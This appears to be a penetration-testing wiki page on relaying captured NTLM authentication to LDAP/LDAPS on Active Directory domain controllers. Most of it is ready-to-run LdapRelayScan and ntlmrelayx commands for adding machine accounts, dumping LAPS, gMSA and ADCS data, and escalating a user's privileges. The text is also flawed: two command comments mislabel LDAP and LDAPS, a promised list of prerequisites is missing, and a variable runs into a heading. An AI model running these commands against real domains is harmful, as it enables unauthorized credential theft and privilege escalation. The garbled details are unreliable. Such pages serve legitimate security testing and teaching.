LDAP Relaying

LDAP Relaying attacks can make use of NTLM authentication. Similar to SMB Relaying, an attacker who captures credentials via MITM6 or Responder can then relay them to a domain controller, targeting LDAP.

It should be noted that the following two defaults need to be set in order for this to be exploited:

Enumeration

LDAPRelayScan

LDAPRelayScan can be utilized to identify whether LDAP Signing and/or LDAP Channel Binding are enabled or not.

# Generic usage of LdapRelayScan.py  
LdapRelayScan.py -u $user -p $password -dc-ip $dcipaddress -method BOTH

Exploitation

Create a new domain computer by abusing the default attribute ms-DS-MachineAccountQuota which is by default set to 10, allowing all authenticated users to add up to 10 computers to the domain.

This account can then be utilized to perform authenticated attacks against the domain such as Kerberoasting.

# Relay to LDAP
ntlmrelayx.py -t ldaps://$dcip --add-computer $computername

# Relay to LDAPS
ntlmrelayx.py -t ldap://$dcip --add-computer $computername

Relay authentication to LDAP and obtain a significant amount of information about the domain such as ADCS configuration, LAPS, groups, users, etc.

ntlmrelayx -t "ldap://$dcip" --dump-adcs --dump-laps --dump-gmsa

Relay captured credentials to LDAPS and escalate the privileges of a specified domain user.

# Relay authentication over LDAPS and attempt to escalate privileges
ntlmrelayx.py -t ldaps://$dcip --escalate-user $usernameLAReferences

References

The worst of both worlds: Combining NTLM Relaying and Kerberos delegationdirkjanm.io

LDAP RelayPentest Everything

RelayThe Hacker Recipes

Obtaining LAPS Passwords Through LDAP Relaying Attacks - PraetorianPraetorian

PreviousRelaying NextSMB Relaying

Last updated 1 year ago